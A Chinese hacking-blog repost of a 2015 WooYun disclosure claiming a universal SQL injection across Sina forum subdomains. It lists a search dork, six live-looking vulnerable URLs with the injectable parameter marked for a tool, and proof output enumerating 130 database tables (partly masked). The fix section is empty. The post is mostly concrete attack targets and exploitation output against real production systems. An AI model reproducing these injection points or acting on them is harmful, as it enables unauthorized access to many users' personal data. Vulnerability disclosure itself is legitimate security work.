记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)

2015-08-20 12:15

百度:

site:sina.com.cn inurl:club

2.png



全部论坛都受影响,自己看每个论坛有多少会员吧,加起来数亿了吧

http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1

http://club.mil.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1

http://club.eladies.sina.com.cn/api/api.php?s=suggest&a=user&q=1

http://club.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1

http://club.ent.sina.com.cn/api/api.php?s=suggest&a=user&q=1

http://club.astro.sina.com.cn/api/api.php?s=suggest&a=user&q=1

。。。。。。。还有好多

漏洞证明:

http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1*

1.png



Database: clubbaby

[130 tables]

mask 区域
*****------*****

*****diplog*****

*****s *****

*****ities *****

*****ityapp*****

*****action*****

*****groups*****

*****notes *****

*****sessio*****

*****tiseme*****

*****ncemen*****

*****hments*****

*****hments*****

*****hpayme*****

*****htypes*****

*****roduct*****

*****log *****

*****d *****

*****es *****

*****forums*****

*****s *****

*****s *****

*****igns *****

*****r_queu*****

*****rlogs *****

*****tslog *****

***** *****

*****eposts*****

*****es *****

*****dlogin*****

***** *****

*****ites *****

*****fields*****

*****links *****

*****recomm*****

*****s *****

*****types *****

*****es *****

*****ool *****

*****log *****

*****market*****

*****s *****

*****s *****

*****rfield*****

*****rmagic*****

*****rs *****

*****rspace*****

*****ators *****

*****g *****

*****rks *****

*****ts *****

*****eads *****

*****elist *****

*****etime *****

*****s *****

*****ntlog *****

*****nhooks*****

*****ns *****

*****nvars *****

***** *****

*****rchind*****

*****ptions*****

***** *****

*****xts *****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

*****ields_*****

***** *****

*****_1 *****

*****_bak *****

*****ctforu*****

*****cts *****

*****lefiel*****

*****cts *****

*****tions *****

***** *****

***** *****

*****og *****

*****s *****

*****edthre*****

*****tlog *****

*****dlog *****

*****ches *****

*****h_queu*****

*****hindex*****

*****ons *****

*****ngs *****

*****es *****

*****caches*****

***** *****

*****ars *****

*****s *****

*****vars *****

*****rums *****

*****riptio*****

***** *****

*****ates *****

*****d_queu*****

*****ds *****

*****dsmod *****

*****dtags *****

*****dtypes*****

*****commen*****

*****log *****

*****option*****

*****s *****

***** *****

*****odels *****

*****ptions*****

*****ptionv*****

*****ars *****

*****e *****

*****ecache*****

*****roups *****

*****ating *****

*****s *****

*****tags *****

***** *****

***** *****

***** *****

*****er *****

***** *****

***** *****

*****er *****

*****------*****



1.png



2.png



就不继续跑了,后补

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0115378

阅读:118267 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪多站存在通用型SQL注入(涉及大量不同业务类型数据用户数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云

本页关键词